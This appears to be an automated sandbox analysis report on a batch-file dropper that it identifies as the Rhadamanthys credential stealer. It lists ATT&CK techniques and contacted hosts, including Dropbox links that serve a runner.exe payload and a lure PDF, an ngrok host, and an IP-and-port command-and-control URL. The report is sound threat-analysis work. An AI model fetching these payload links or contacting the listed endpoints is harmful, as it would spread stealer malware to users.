Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000018.00000003.2403887025.0000000003120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2394734471.0000000002E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2509453717.0000000003390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2413715867.0000000003180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000018.00000003.2403887025.0000000003120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2394734471.0000000002E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2509453717.0000000003390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2413715867.0000000003180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	211 Process Injection	11 Masquerading	21 Input Capture	221 Security Software Discovery	Remote Services	21 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	51 Virtualization/Sandbox Evasion	Security Account Manager	51 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	211 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	133 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
122046760.bat	13%	ReversingLabs	Win32.Trojan.Boxter

Source	Detection	Scanner	Label
https://uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com/cd/0/get/CgZVgLsyz241_BcFKRBGtAj2rvkL	0%	Avira URL Cloud	safe
https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com	0%	Avira URL Cloud	safe
https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	0%	Avira URL Cloud	safe
http://www.ubi.com	0%	Avira URL Cloud	safe
https://uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com	0%	Avira URL Cloud	safe
https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com/cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_0JESI6SNiNP7CaPd1OJi9tRlu7r8wijxjLZyykc6Q1zEuEVi8G5U8BE_7agz1kxv7JuvJQO8rp8v1I6W6qhugEUNq9qs0rsQkKkEmZ-ThhGY4RjrXNSPySTfU1qW/file?dl=1	0%	Avira URL Cloud	safe
http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	0%	Avira URL Cloud	safe
https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com/cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_	0%	Avira URL Cloud	safe
https://permanently-removed.invalid/reauth/v1beta/users/rowser	0%	Avira URL Cloud	safe
https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fg.microsoft.map.fastly.net	199.232.214.172	true	false	high
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	3.6.122.107	true	false	high
edge-block-www-env.dropbox-dns.com	162.125.69.15	true	false	high
www-env.dropbox-dns.com	162.125.69.18	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
googlehosted.l.googleusercontent.com	142.251.37.33	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com	unknown	unknown	false	unknown
www.dropbox.com	unknown	unknown	false	high
uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com/cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_0JESI6SNiNP7CaPd1OJi9tRlu7r8wijxjLZyykc6Q1zEuEVi8G5U8BE_7agz1kxv7JuvJQO8rp8v1I6W6qhugEUNq9qs0rsQkKkEmZ-ThhGY4RjrXNSPySTfU1qW/file?dl=1	false	Avira URL Cloud: safe	unknown
https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx	false		high
https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1	false		high
https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk	true	Avira URL Cloud: safe	unknown
https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ubi.com/it	bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	false		high
https://permanently-removed.invalid/oauth2/v2/tokeninfo	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paper.dropbox.com/cloud-docs/edit	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000002.00000002.2343680999.0000013D2568C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com/cd/0/get/CgZVgLsyz241_BcFKRBGtAj2rvkL	powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000004.00000003.1800129032.00000252A9E83000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1800129032.00000252A9EE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellosign.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ubi.comd:/dev/assassin-playground/dx10_integration/main/extern/onlineservices/Tracking/Module	bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	false		high
https://www.dropbox.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000004.00000003.1800129032.00000252A9E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.docsend.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/LogoutYxABzen	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com	powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ubi.com	bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-des	powershell.exe, 00000002.00000002.2268647629.0000013D0E163000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropboxstatic.com/static/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	powershell.exe, 00000002.00000002.2268647629.0000013D0DC6C000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://officeapps-df.live.com	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.login.yahoo.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://office.net/	msedge.exe, 00000003.00000002.1815961673.00004AFC002E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2268647629.0000013D0CFD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com	powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000004.00000003.1800129032.00000252A9EA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.yahoo.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/playlist/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://onedrive.live.com/picker	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/oauth2/v4/token	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com	powershell.exe, 00000002.00000002.2268647629.0000013D0D1F7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2268647629.0000013D0D1F7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2268647629.0000013D0D1F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	msedge.exe, 00000003.00000002.1814629935.00004AFC00040000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/oauth/multilogin	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	false		high
http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	powershell.exe, 00000002.00000002.2268647629.0000013D0DC6C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000004.00000002.2930180764.00000252AA085000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7gC	powershell.exe, 00000002.00000002.2341629826.0000013D25540000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi	fontdrvhost.exe, 00000018.00000003.2440367132.0000000005714000.00000004.00000020.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/oauth2/v1/userinfo	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/v/s/playlist/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/OAuthLogin	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2268647629.0000013D0D1F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/document/fsip/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com/cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://permanently-removed.invalid/chrome/blank.html	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ubi.com/fr	bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	false		high
https://permanently-removed.invalid/v1/issuetoken	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.dropbox.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://msn.cn/	msedge.exe, 00000003.00000002.1815961673.00004AFC002E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/fsip/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://canny.io/sdk.js	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/reauth/v1beta/users/	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	false		high
https://selfguidedlearning.dropboxbusiness.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	msedge.exe, 00000003.00000002.1814629935.00004AFC00040000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/J	msedge.exe, 00000003.00000002.1814629935.00004AFC00040000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/presentation/fsip/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl-web.dropbox.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellofax.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist	powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/service_worker.js	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ubi.com/es	bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	false		high
https://permanently-removed.invalid/RotateBoundCookies	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
